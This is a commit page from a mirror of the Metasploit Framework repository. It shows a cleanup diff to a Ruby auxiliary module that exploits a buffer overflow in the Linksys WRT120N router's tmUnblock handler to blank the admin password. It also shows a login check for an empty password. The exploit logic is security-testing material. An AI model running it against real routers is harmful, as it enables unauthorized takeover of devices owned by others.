infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do minor cleanup

bug/bundler_fix
jvazquez-r7 2014-02-26 09:32:11 -06:00
parent b79197b8ab
commit 582372ec3e
1 changed files with 39 additions and 37 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

76
modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb
View File

@ -13,9 +13,10 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Linksys WRT120N tmUnblock Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router.
It is possible to reset the password of the management interface temporarily to an
empty value. It was tested on a WRT120N firmware version 1.0.07.
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router
to reset the password of the management interface temporarily to an empty value.
This module has been tested successfully on a WRT120N device with firmware version
1.0.07.
},
'Author' =>
[
@ -32,33 +33,34 @@ class Metasploit3 < Msf::Auxiliary
'DisclosureDate' => 'Feb 19 2014'))
end
def check_login(user,pass)
def check_login(user)
print_status("#{peer} - Trying to login with #{user} and empty password")
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET',
'authorization' => basic_auth(user,"")
})
if res.nil? or res.code == 404
print_status("#{peer} - No successful login possible with #{user} and empty password")
return false
end
if [200, 301, 302].include?(res.code)
print_good("#{peer} - Successful login #{user} and empty password")
return true
else
print_status("#{peer} - No successful login possible with #{user} and empty password")
return false
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
res = send_request_cgi({
'uri' => '/',
'method' => 'GET',
'authorization' => basic_auth(user,"")
})
if res.nil? || res.code == 404
print_status("#{peer} - No successful login possible with #{user} and empty password")
return false
elsif [200, 301, 302].include?(res.code)
print_good("#{peer} - Successful login #{user} and empty password")
return true
else
print_status("#{peer} - No successful login possible with #{user} and empty password")
return false
end
end
def run
if (check_login("admin","") == true)
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
begin
if check_login("admin")
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
return
end
rescue ::Rex::ConnectionError
print_error("#{peer} - Failed to connect to the web server")
return
end
@ -87,22 +89,22 @@ class Metasploit3 < Msf::Auxiliary
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'period' => '0',
'TM_Block_MAC' => '00:01:02:03:04:05',
'TM_Block_URL' => postdata
}
'period' => '0',
'TM_Block_MAC' => '00:01:02:03:04:05',
'TM_Block_URL' => postdata
}
})
if res and res.code == 500
if (check_login("admin","") == true)
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
else
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
end
if res and res.code == 500
if check_login("admin")
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
else
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
end
else
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
end
rescue ::Rex::ConnectionError
vprint_error("#{peer} - Failed to connect to the web server")
print_error("#{peer} - Failed to connect to the web server")
return
end
end